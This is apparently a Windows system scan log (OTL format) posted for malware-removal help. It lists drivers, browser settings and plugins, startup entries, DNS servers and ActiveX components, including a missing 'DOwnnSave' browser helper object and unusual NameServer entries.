DRV:[b]64bit:[/b] - [2013/05/31 09:17:00 | 000,112,888 | ---- | M] (AhnLab, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\Mkd2Nadr.sys -- (Mkd2Nadr)
DRV:[b]64bit:[/b] - [2013/05/31 01:16:40 | 000,064,280 | ---- | M] (Logitech Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\LGSHidFilt.Sys -- (LGSHidFilt)
DRV:[b]64bit:[/b] - [2012/11/13 16:49:00 | 000,098,104 | ---- | M] (AhnLab, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\Mkd2BthF.sys -- (Mkd2Bthf)
DRV:[b]64bit:[/b] - [2012/08/23 23:10:20 | 000,019,456 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rdpvideominiport.sys -- (RdpVideoMiniport)
DRV:[b]64bit:[/b] - [2012/08/23 23:08:26 | 000,030,208 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD)
DRV:[b]64bit:[/b] - [2012/08/21 13:01:20 | 000,033,240 | ---- | M] (GEAR Software Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\GEARAspiWDM.sys -- (GEARAspiWDM)
DRV:[b]64bit:[/b] - [2012/07/17 18:12:08 | 000,062,784 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\HECIx64.sys -- (MEIx64)
DRV:[b]64bit:[/b] - [2012/06/20 12:05:07 | 000,062,776 | ---- | M] (Egis Technology Inc.) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\mwlPSDVDisk.sys -- (mwlPSDVDisk)
DRV:[b]64bit:[/b] - [2012/06/20 12:05:07 | 000,022,648 | ---- | M] (Egis Technology Inc.) [File_System | System | Running] -- C:\Windows\SysNative\drivers\mwlPSDFilter.sys -- (mwlPSDFilter)
DRV:[b]64bit:[/b] - [2012/06/20 12:05:07 | 000,020,520 | ---- | M] (Egis Technology Inc.) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\mwlPSDNserv.sys -- (mwlPSDNServ)
DRV:[b]64bit:[/b] - [2012/06/01 17:35:58 | 000,083,576 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\bScsiSDa.sys -- (bScsiSDa)
DRV:[b]64bit:[/b] - [2012/03/27 11:09:54 | 014,748,416 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\igdkmd64.sys -- (igfx)
DRV:[b]64bit:[/b] - [2012/03/07 22:48:20 | 000,238,384 | ---- | M] (ELAN Microelectronics Corp.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\ETD.sys -- (ETD)
DRV:[b]64bit:[/b] - [2012/03/01 15:46:16 | 000,023,408 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\Windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:[b]64bit:[/b] - [2012/02/22 12:29:46 | 000,100,912 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mferkdet.sys -- (mferkdet)
DRV:[b]64bit:[/b] - [2012/02/07 15:03:06 | 000,018,432 | ---- | M] (NTI Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\NTIDrvr.sys -- (NTIDrvr)
DRV:[b]64bit:[/b] - [2012/02/07 15:03:06 | 000,017,408 | ---- | M] (NTI Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\UBHelper.sys -- (UBHelper)
DRV:[b]64bit:[/b] - [2012/02/01 16:16:40 | 000,568,600 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStor.sys -- (iaStor)
DRV:[b]64bit:[/b] - [2012/01/20 16:14:34 | 000,016,128 | ---- | M] (Intel(R) Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\TurboB.sys -- (TurboB)
DRV:[b]64bit:[/b] - [2012/01/19 00:30:42 | 000,435,240 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\k57nd60a.sys -- (k57nd60a)
DRV:[b]64bit:[/b] - [2011/12/06 20:23:08 | 000,331,264 | ---- | M] (Intel(R) Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\IntcDAud.sys -- (IntcDAud)
DRV:[b]64bit:[/b] - [2011/11/04 10:21:38 | 000,019,496 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\b57xdmp.sys -- (b57xdmp)
DRV:[b]64bit:[/b] - [2011/11/04 10:21:36 | 000,068,648 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\b57xdbd.sys -- (b57xdbd)
DRV:[b]64bit:[/b] - [2011/09/02 14:36:58 | 000,051,752 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\bScsiMSa.sys -- (bScsiMSa)
DRV:[b]64bit:[/b] - [2011/07/14 16:32:23 | 000,107,904 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:[b]64bit:[/b] - [2011/07/14 16:32:23 | 000,027,008 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:[b]64bit:[/b] - [2010/11/21 12:23:47 | 000,109,056 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\sdbus.sys -- (sdbus)
DRV:[b]64bit:[/b] - [2010/11/21 12:23:47 | 000,078,720 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:[b]64bit:[/b] - [2009/11/24 09:38:00 | 000,016,008 | ---- | M] (Logitech Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\LGVirHid.sys -- (LGVirHid)
DRV:[b]64bit:[/b] - [2009/11/24 09:37:50 | 000,022,408 | ---- | M] (Logitech Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\LGBusEnum.sys -- (LGBusEnum)
DRV:[b]64bit:[/b] - [2009/07/14 10:52:20 | 000,194,128 | ---- | M] (AMD Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:[b]64bit:[/b] - [2009/07/14 10:48:04 | 000,065,600 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:[b]64bit:[/b] - [2009/07/14 10:45:55 | 000,024,656 | ---- | M] (Promise Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:[b]64bit:[/b] - [2009/06/11 05:34:33 | 003,286,016 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:[b]64bit:[/b] - [2009/06/11 05:34:28 | 000,468,480 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:[b]64bit:[/b] - [2009/06/11 05:34:23 | 000,270,848 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (b57nd60a)
DRV:[b]64bit:[/b] - [2009/06/11 05:31:59 | 000,031,232 | ---- | M] (Hauppauge Computer Works, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hcw85cir.sys -- (hcw85cir)
DRV:[b]64bit:[/b] - [2009/03/18 17:35:42 | 000,033,856 | -H-- | M] (LogMeIn, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\hamachi.sys -- (hamachi)
DRV - [2009/07/14 10:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount)


[color=#E56717]========== Standard Registry (SafeList) ==========[/color]


[color=#E56717]========== Internet Explorer ==========[/color]

IE:[b]64bit:[/b] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=MSSE
IE:[b]64bit:[/b] - HKLM\..\SearchScopes,DefaultScope = {33BB0A4E-99AF-4226-BDF6-49120163DE86}
IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&form=AARTDF&pc=MAAR&src=IE-SearchBox
IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}: "URL" = http://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=MSSE
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&form=AARTDF&pc=MAAR&src=IE-SearchBox


IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0



IE - HKU\S-1-5-21-2268393351-900118556-74167924-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Search Bar = Preserve
IE - HKU\S-1-5-21-2268393351-900118556-74167924-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
IE - HKU\S-1-5-21-2268393351-900118556-74167924-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=MSSE
IE - HKU\S-1-5-21-2268393351-900118556-74167924-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/ja-jp/?ocid=iehp
IE - HKU\S-1-5-21-2268393351-900118556-74167924-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = ja-JP
IE - HKU\S-1-5-21-2268393351-900118556-74167924-1000\..\SearchScopes,DefaultScope = {C4AA6A22-6DB2-4D2C-AC97-E1D8FAC41939}
IE - HKU\S-1-5-21-2268393351-900118556-74167924-1000\..\SearchScopes\{C4AA6A22-6DB2-4D2C-AC97-E1D8FAC41939}: "URL" = http://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
IE - HKU\S-1-5-21-2268393351-900118556-74167924-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKU\S-1-5-21-2268393351-900118556-74167924-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local

[color=#E56717]========== FireFox ==========[/color]

FF - prefs.js..browser.search.countryCode: "JP"
FF - prefs.js..browser.search.region: "JP"
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:40.0.3
FF - user.js - File not found

FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF64_18_0_0_232.dll File not found
FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\@esn/npbattlelog,version=2.6.2: C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelogx64.dll (EA Digital Illusions CE AB)
FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.1.40416.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_232.dll ()
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=: File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@esn/npbattlelog,version=2.4.0: C:\Program Files (x86)\Battlelog Web Plugins\2.4.0\npbattlelog.dll (EA Digital Illusions CE AB)
FF - HKLM\Software\MozillaPlugins\@esn/npbattlelog,version=2.6.2: C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelog.dll (EA Digital Illusions CE AB)
FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI ipt;version=2.0.59: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI updater: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=11.60.2: C:\Program Files (x86)\Java\jre1.8.0_60\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=11.60.2: C:\Program Files (x86)\Java\jre1.8.0_60\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files (x86)\Microsoft Silverlight\5.1.40416.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3502.0922: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3538.0513: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@nexon.co.jp/NxGame: C:\ProgramData\NexonJP\NGM\npNxGameJP.dll (Nexon)
FF - HKLM\Software\MozillaPlugins\@pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll File not found
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.28.13\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.28.13\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKCU\Software\MozillaPlugins\@unity3d.com/UnityPlayer,version=1.0: C:\Users\【ユーザー名】\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)

FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 40.0.3\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 40.0.3\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins

[2015/09/14 16:41:27 | 000,000,000 | ---D | M] (No name found) -- C:\Users\【ユーザー名】\AppData\Roaming\mozilla\Extensions
[2015/09/14 16:41:07 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2015/09/14 16:41:07 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}

[color=#E56717]========== Chrome ==========[/color]

CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.0_0\
CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.7_0\
CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb\1.9.1_0\
CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.30_0\
CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\eablgejicbklomgaiclcolfilbkckngf\1.2.1_0\
CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpkfjicglakibpenojifdiepckckakgk\1.13.4_0\
CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg\0.3.0.5_0\
CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcbpblocgmgfnpjjppndjkmgjaogfceg\0.98.80_0\
CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.1.2.0_0\
CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\
CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\plnacehkknmafkjgkikclamogikoiaaa\1.1_0\

O1 HOSTS File: ([2015/09/13 16:57:37 | 000,000,098 | ---- | M]) - C:\Windows\SysNative\drivers\etc\Hosts
O1 - Hosts: 127.0.0.1 localhost
O1 - Hosts: ::1 localhost
O2:[b]64bit:[/b] - BHO: (DOwnnSave) - {7F6EE392-0640-444B-B105-4FDE528B793E} - C:\Program Files (x86)\DOwnnSave\v6zSk4iGH18oQh.x64.dll File not found
O2:[b]64bit:[/b] - BHO: (Skype Click to Call for Internet Explorer) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O2 - BHO: (Java(tm) Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_60\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (Skype Click to Call for Internet Explorer) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O2 - BHO: (Java(tm) Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_60\bin\jp2ssv.dll (Oracle Corporation)
O4:[b]64bit:[/b] - HKLM..\Run: [ETDCtrl] C:\Program Files\Elantech\ETDCtrl.exe (ELAN Microelectronics Corp.)
O4:[b]64bit:[/b] - HKLM..\Run: [HotKeysCmds] C:\Windows\SysNative\hkcmd.exe (Intel Corporation)
O4:[b]64bit:[/b] - HKLM..\Run: [IgfxTray] C:\Windows\SysNative\igfxtray.exe (Intel Corporation)
O4:[b]64bit:[/b] - HKLM..\Run: [IntelTBRunOnce] wscript.exe //b //nologo "C:\Program Files\Intel\TurboBoost\RunTBGadgetOnce.vbs" File not found
O4:[b]64bit:[/b] - HKLM..\Run: [Launch LCore] C:\Program Files\Logicool Gaming Software\LCore.exe (Logitech Inc.)
O4:[b]64bit:[/b] - HKLM..\Run: [Logitech Download Assistant] C:\Windows\SysNative\LogiLDA.dll (Logitech, Inc.)
O4:[b]64bit:[/b] - HKLM..\Run: [MSC] c:\Program Files\Microsoft Security Client\msseces.exe (Microsoft Corporation)
O4:[b]64bit:[/b] - HKLM..\Run: [Persistence] C:\Windows\SysNative\igfxpers.exe (Intel Corporation)
O4 - HKLM..\Run: [BackupManagerTray] C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe (NTI Corporation)
O4 - HKLM..\Run: [Google Japanese Input Prelauncher] C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaBroker32.exe (Google Inc.)
O4 - HKLM..\Run: [LManager] C:\Program Files (x86)\Launch Manager\LManager.exe (Dritek System Inc.)
O4 - HKLM..\Run: [SuiteTray] C:\Program Files (x86)\EgisTec MyWinLockerSuite\x86\SuiteTray.exe (Egis Technology Inc.)
O4 - HKU\S-1-5-19..\Run: [Sidebar] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe (Microsoft Corporation)
O4 - HKU\S-1-5-20..\Run: [Sidebar] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe (Microsoft Corporation)
O4 - HKU\S-1-5-21-2268393351-900118556-74167924-1000..\Run: [CCleaner Monitoring] C:\Program Files\CCleaner\CCleaner64.exe (Piriform Ltd)
O4 - HKU\S-1-5-21-2268393351-900118556-74167924-1000..\Run: [Dropbox Update] C:\Users\【ユーザー名】\AppData\Local\Dropbox\Update\DropboxUpdate.exe (Dropbox, Inc.)
O4 - HKU\S-1-5-19..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
O4 - HKU\S-1-5-20..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
O4 - Startup: C:\Users\【ユーザー名】\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk = C:\Users\【ユーザー名】\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O9:[b]64bit:[/b] - Extra Button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O9 - Extra Button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O10:[b]64bit:[/b] - NameSpace_Catalog5\Catalog_Entries64\000000000009 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000009 [] - C:\Program Files (x86)\Bonjour\mdnsNSP.dll (Apple Inc.)
O13[b]64bit:[/b] - gopher Prefix: missing
O13 - gopher Prefix: missing
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: DhcpNameServer = 192.168.50.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: NameServer = 199.203.131.145,82.163.143.167
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{5079169B-AD83-42A3-B1B3-C04B8C96D5A8}: NameServer = 199.203.131.145,82.163.143.167
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{C678E09F-B902-4D1E-87D2-AE9B8DCDE689}: NameServer = 192.168.50.1
O18:[b]64bit:[/b] - Protocol\Handler\livecall - No CLSID value found
O18:[b]64bit:[/b] - Protocol\Handler\msnim - No CLSID value found
O18:[b]64bit:[/b] - Protocol\Handler\skypec2c {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O18:[b]64bit:[/b] - Protocol\Handler\wlmailhtml - No CLSID value found
O18:[b]64bit:[/b] - Protocol\Handler\wlpg - No CLSID value found
O18 - Protocol\Handler\skypec2c {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O20:[b]64bit:[/b] - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:[b]64bit:[/b] - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\Windows\SysWow64\userinit.exe (Microsoft Corporation)
O20:[b]64bit:[/b] - Winlogon\Notify\igfxcui: DllName - (igfxdev.dll) - C:\Windows\SysNative\igfxdev.dll (Intel Corporation)
O21:[b]64bit:[/b] - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O32 - HKLM CDRom: AutoRun - 1
O33 - MountPoints2\{2558c854-d459-11e3-a87a-208984cf2c64}\Shell - "" = AutoRun
O33 - MountPoints2\{2558c854-d459-11e3-a87a-208984cf2c64}\Shell\AutoRun\command - "" = E:\setup.exe
O33 - MountPoints2\{37963c8e-b209-11e4-9d99-208984cf2c64}\Shell - "" = AutoRun
O33 - MountPoints2\{37963c8e-b209-11e4-9d99-208984cf2c64}\Shell\AutoRun\command - "" = E:\setup.exe
O33 - MountPoints2\{617f691c-d6a3-11e3-b617-208984cf2c64}\Shell - "" = AutoRun
O33 - MountPoints2\{617f691c-d6a3-11e3-b617-208984cf2c64}\Shell\AutoRun\command - "" = E:\setup.exe
O33 - MountPoints2\{abdeda0d-d52d-11e3-b8ba-208984cf2c64}\Shell - "" = AutoRun
O33 - MountPoints2\{abdeda0d-d52d-11e3-b8ba-208984cf2c64}\Shell\AutoRun\command - "" = E:\setup.exe
O34 - HKLM BootExecute: (autocheck autochk *)
O35:[b]64bit:[/b] - HKLM\..comfile [open] -- "%1" %*
O35:[b]64bit:[/b] - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:[b]64bit:[/b] - HKLM\...com [@ = comfile] -- "%1" %*
O37:[b]64bit:[/b] - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)

ActiveX:[b]64bit:[/b] {12d0ed0d-0ee0-4f90-8827-78cefb8f4988} - C:\Windows\system32\ieudinit.exe
ActiveX:[b]64bit:[/b] {1AD147D0-BE0E-3D6C-AC11-64F6DC4163F1} - .NET Framework
ActiveX:[b]64bit:[/b] {22d6f312-b0f6-11d0-94ab-0080c74c7e95} - Microsoft Windows Media Player 12.0
ActiveX:[b]64bit:[/b] {26784146-6E05-3FF9-9335-786C7C0FB5BE} - .NET Framework
ActiveX:[b]64bit:[/b] {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - %SystemRoot%\system32\regsvr32.exe /s /n /i:/UserInstall %SystemRoot%\system32\themeui.dll
ActiveX:[b]64bit:[/b] {2D46B6DC-2207-486B-B523-A557E6D54B47} - C:\Windows\system32\cmd.exe /D /C start C:\Windows\system32\ie4uinit.exe -ClearIconCache
ActiveX:[b]64bit:[/b] {3af36230-a269-11d1-b5bf-0000f8051515} - Offline Browsing Pack
ActiveX:[b]64bit:[/b] {44BBA840-CC51-11CF-AAFA-00AA00B6015C} - "%ProgramFiles%\Windows Mail\WinMail.exe" OCInstallUserConfigOE
ActiveX:[b]64bit:[/b] {44BBA855-CC51-11CF-AAFA-00AA00B6015F} - DirectDrawEx
ActiveX:[b]64bit:[/b] {45ea75a0-a269-11d1-b5bf-0000f8051515} - Internet Explorer Help
ActiveX:[b]64bit:[/b] {4f645220-306d-11d2-995d-00c04f98bbc9} - Microsoft Windows Script 5.6
ActiveX:[b]64bit:[/b] {5fd399c0-a70a-11d1-9948-00c04f98bbc9} - Internet Explorer Setup Tools
ActiveX:[b]64bit:[/b] {630b1da0-b465-11d1-9948-00c04f98bbc9} - Browsing Enhancements
ActiveX:[b]64bit:[/b] {6BF52A52-394A-11d3-B153-00C04F79FAA6} - Microsoft Windows Media Player
ActiveX:[b]64bit:[/b] {6fab99d0-bab8-11d1-994a-00c04f98bbc9} - MSN Site Access
ActiveX:[b]64bit:[/b] {7790769C-0471-11d2-AF11-00C04FA35D02} - Address Book 7
ActiveX:[b]64bit:[/b] {7DEBE4EB-6B40-3766-BB35-5CBBC385DA37} - .NET Framework
ActiveX:[b]64bit:[/b] {89820200-ECBD-11cf-8B85-00AA005B4340} - regsvr32.exe /s /n /i:U shell32.dll
